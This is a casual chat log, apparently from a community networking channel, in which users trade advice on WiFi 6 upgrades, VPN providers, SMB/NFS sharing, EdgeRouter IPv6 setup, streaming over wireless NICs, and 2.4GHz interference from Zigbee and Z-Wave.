@twin warren also this is why I like to have everything seperate, no all in one router. I can pay for a good router and keep the router and then just upgrade the access point if I need to

And at the same time, there isn’t really a benefit for WiFi 6 for us right now

We don’t have much interference near by and we don’t need that performance on WiFi

Always a benefit

Those blazing fast speeds /s

reviews of the unifi wifi6 aps suggested there is only 10-20% performance improvement at the moment

I pull around 400Mbps on my AC Pro right now with my 12 Pro

But this guy pulls like 800Mbps on the u6 lite with his 11 pro

That would be nice but I don’t need it lol

I mean, at the same time, do you really need it

oh

yeah

I don’t do anything bandwidth intensive on my phone

400Mbps is plenty already

at least we get 1 Gbps here in Romania

Maybe if we had more clients or lived in a place with a shit ton of other aps, but we don’t

That’s wired :P

I do get gigabit on wired

I don’t need it on WiFi

Most of the nearby APs logged are just car hotspots so doesn’t really affect that much lol

I only get 300mbps on my s21 ultra on speedtest 😦

that's enough

well, what do y'all think of torguard?

https://tenor.com/view/whatever-shrug-idk-i-dont-know-elmo-gif-16565594

Used it in the past. Pretty stable but it costs quite a bit more than services like PIA. Torguard connections seem a lot more stable than expressvpn.

When I used torguard, my dockers could stay connected for months. Switching over to expressvpn and the connections 'die' every week. The VPN connection is still there but DNS resolution stops working and I basically need to restart the VPN connection. I eventually added a cron job to take care of that. For PIA, I am using wireguard instead of openvpn and so far connection seems pretty stable. Only 1 disconnection after a few weeks.

I just don't use vpns

no need

wish I could say the same, but here in 3rd world internet life is geo-restricted 😛

ah, must really be annoying

stupid geo-locks

still, even in more civilized countries, Japanese Netflix is still japanese-only for anime fans 😛

I don't use netflix so it's fine

hehe, really ? where do you get your shows craving satisfaction from ?

my needs are to just help obfuscate myself from tracking a little more, and to get past the great firewall the next time i go to mainland china

don't need to use it to access like british netflix or whatever

There is a few Russian and Chinese projects on github that are meant just for Great Firewall bypass

also another network-related question: can an SMB and NFS share connect to the same pool?

really really not recommended

noted lol

i'll just get my manjaro install to connect with SMB then

https://github.com/v3aqb/fwlite

I tried it once on zfs and had weird locking issues

NFS Linux Perms take priority

You have to use ACL to fix the SMB

yeah... i'll just use SMB then

esxi mounting the volume as nfs while smb was providing access to some files. It was a locking issue for me, not ACL

NAS is shared with other windows PCs and macs

Tack it on to the long list of conflicts

If you run a NAS like Synology or QNAP or TrueNAS, itll isolate those issues but if you DIY the NAS, you gotta hand fix it

Just create diff zfs on the pool for the different purposes. It is better anyway. Different block sizes for different use case.

I mean, its really not that bad since you just use a softlink to the main root

i am on truenas

Its amazing how few people know of "purpose based" alignment on ZFS

To me its the best shit ever

🙂

I don't

youtube

if anything

@peak cloak on the edgerouter X is there a default ipv6 firewall of some kind?

like what happens if you just enable dhcpv6-pd to get a prefix and stick a /64 on the switch0 interface

does it work? does it have an ipv6 firewall? if not, is the default to pass all ipv6 traffic or to deny all ipv6 traffic?

default, I don't think so

I added it manually

no native ipv6 here, going though a tunnel

ok

I know though there are problems with v6 and hardware accelerated nat

but if you don't set up an ipv6 firewall, does it block all ipv6 traffic with no firewall, or does it allow everything through?

that's the reason for hex S

no clue

would have to test

once I get HEX S I can try that for you

ok

yeah I was trying to help someone with an edgerouter set up dhcpv6 prefix delegation

and it isn't doing anything

and I don't know how to troubleshoot it

lan side?

no.. just getting a /56 prefix from the isp and sticking a /64 from that on switch0

ah

edgerouter doesn't actually have support for being a dhcpv6-pd server I believe

ah I'm confusing dhcpv6-pd and dhcpv6

edgerouter is just running linux so it supports anything you want

you get root with no jailbreak

yeah, but then that messes things up

yeah for something like dhcpv6 pd server that integrates so tightly with everything else on the router, you wouldn't want to run that from the command line with some kind of hack

otherwise you are just asking for things to be unreliable even if it seems to work

@copper rover hey ill just order a new router, cuz it got bricked.

he overclocked it

overclocked it?

set the CPU speed and Voltage through NVRAM Settings

why did he/she do that? wasn't computer just trying to apply factory netgear firmware to it?

Digging around with shit he shouldnt

are we still on this overclocking nonsense from yesterday?

overclocking 1G ethernet

Nah, from what I understand it's the guy who wanted to update the isp locked firmware and accidentally overclocked and bricked it

lol wat

🤣

#networking message

@tame carbon isn't it the middle of the night there?

you are either up very late or very early

@tender hazel yeah

some family things

intervention and all

got a bit late

had to help my little brother out with somethings

im heading off now

cya

dang.... I am finally getting gigabit speed down and 25 Mbps up from comcast

I never thought this day would come...

Sort of a networking question: Can I use two NIC's for streaming on Twitch with only a wifi connection? 1 for my game, and the 2nd for my OBS(set to stream from its IP)
I can't move my PC to the center of my living room, nor can I drill a hole in my apartment for a cat cable, so I'm trying to see what's going wrong with my streams as of late, and so far, it seems to be my internet.

use networks expansion instead ... like TP-LINK TL-PA4015PKIT

it use your electric current wire installation to carry network signal.

or switch your router to wifi6 (gigabit wifi)

That would be link aggregation, and results wouldn’t be great with 2 WiFi nics. Might even potentially be worse from interference. Using them with 2 separate IP addresses wouldn’t work, windows would default to just using the one with best connection, and it can create a race condition with the networking

there is no point in using two NIC's except for failover

I mean you could use them for teaming/aggregation but usually it is for failover

and with wireless there is no real aggregation

unlike with wired where you can at least aggregate two separate 1Gbps links

False, you can in fact LAGG 2 WiFi nics

I tried it on a lark, and it “works”

I said what is the point

you won't get any more bandwidth

when I said with wireless there is no real aggregation

you get more incoming capacity

I meant with wireless you wouldn't get higher speed as a result of aggregation

Could act as an ad-hoc QoS, and give you more priority because you’d have twice the hw addresses

Probably not enough to justify the mbps/$ ratio

Not looking to get extra speed, but basically take the load of playing a game and streaming

Off*

@hasty oriole that only works with a faster internet connection

I have a 360mgps connection, is that fast enough?

upload speed, because you stream

what's the upload

having twice the hw addresses doesn't necessarily give you more priority - it increases the signaling overhead

About 30-40

and reduces the overall data rate rather than increasing it, most likely

there is no point in aggregating two wireless links if they share the same AP

the only way that aggregating two wireless links could potentially improve performance is if they have separate APs

AP? Access points? (Sorry, still new to networking)

yes

Ok, so really no point, and will not accomplish what I want it to do

?

yup, no point, and will not accomplish what you want. You can use other solutions to prioritize certain traffic over a single wireless link

ex. setting priority for MME

Could the lag also be my OBS settings?

it is still not perfect, but it will try to prioritize certain traffic over wireless

are you using the same SSID for 2.4ghz and 5ghz wireless?

for this, yeah, their are tools like this https://www.netlimiter.com/

if you are using the same SSID for both it could be that you are connecting via 2.4ghz

with a software network limiter, you can limit streaming bandwidth to not be more than what you specify

so you can still play games without high latency

yes, that is a decent option

I'll look into, thanks people!

Such a piss off, i spend $1200 in upgrades and PC goes ass up

if you use the same SSID for 2.4ghz and 5ghz your wireless might be connecting via 2.4ghz when it could easily connect via 5ghz

same SSID means it is up to your wireless card to decide when to switch between 2.4ghz and 5ghz

and some wireless cards will stay on 2.4ghz for far too long

with 2.4ghz wireless you can only get about 50-75Mbps actual performance at the most

and if you have lots of interference, ex. in an apartment block, 10Mbps actual performance

If I lived in an apartment, I would ask to share cost with neighbors and deploy a proper distributed AP layout for everyone, then isolate,

It annoys me how much we dirty our airspace willingly

All because "MINE"

@plain siren just use 5GHz.

Have an AP in the room you want wireless access, 5GHz will give you full speeds

Zigbee

ISM Band Devices

Etc etc etc

@plain siren Zigbee doesn't interfere with 5GHz.

Its on the 2.4GHz band

Z-wave is even lower frequency

915MHz in US and 868MHz in Europe

Im saying Routers fucking with zigbee

which is actually sometimes an issue

2.4GHz wireless yeah

Also Z-Wave is propritary

But 2.4GHz is most crowded band of all

Exactly, Im saying we crowd it willingly too

Its used by bluetooth, 802.11 wireless, and 2.454 GHz is your microwave.

@plain siren then use 5GHz :D

I get 400mbit/s on that

5Ghz is a licensed for specific use band

nope

You cant run ISM Self-Isolated devices on 5Ghz

they are constrained to the 2.4 and lower ISM's

So community projects like Zigbee

Are fucked

ISM is just an acronym for a range of bands

Yes

And Zigbee is garbage anyways :P

So is Z-Wave

propietary crap, has no place on a public bandwidth allocation chart.

Zigbee is FOSS

You just said it isn't

Z-Wave isnt

Well then, what is your problem lol

I use the FOSS shit

IoT devices don't even need a lot of bandwidth

And to have Z-wave made things you have to have a cert signed by the Z-Wave alliance

and if you need fast wireless access, use 5GHz instead.

@plain siren same with the LoRa alliance.

Another propietary certification

At least they have oversight by ITU

yep

Z-Wave is Honeywell

Op? No cert? No workie

Want one? Its about 20K For Administration and Testing Passes

Then 50K a year

200 Per registration for each device

on top

Then don't use it :P

Z-Wave Security? Also prop.

Zigbee is SSL at least

if I need a WPAN network, I use NRF24

https://www.nordicsemi.com/Products/Low-power-short-range-wireless/nRF24-series

also operates on the 2.4GHz band

much higher datarates.

IoT devices give a constant stream of data which WiFi really isnt handled for so zigbee is literally +1 to noise floor per device

Which is really funny

And Zigbee also cant predict the MIMO of WiFi

It was an amazing storm of RF Inter-destination air collisions.

sounds more like a zigbee problem :P

802.11 is just the gatekeeper of 2.4GHz

it drowns out all.

@plain siren for permanent IoT @ home I still favor wired protocols over wireless

Actually a phillips hue device can RIP a router

They like to get agressive

Its funny af

That being said, IEEE has something in the works

With the Zigbee workgroup

MIMO Fair Use Policy that can also interpolate with Zigbee

Meanwhile Z-Wave is set to lose their band space due to another upcoming remapping of our assignments (which has a whole purpose of alleviating these exact issues so its kinda ironic)

Open Source Collab has taken a perm foothold in the writing of the future. Proprietary is no longer safe just because they cant be decoded.

This goes for shit like OS' and Software too

propietary protocols have no place on public allocation charts.

Except maybe Ku and Xu bands

but those are military crap anyways, good luck de-allocating those

They already offered them 2 times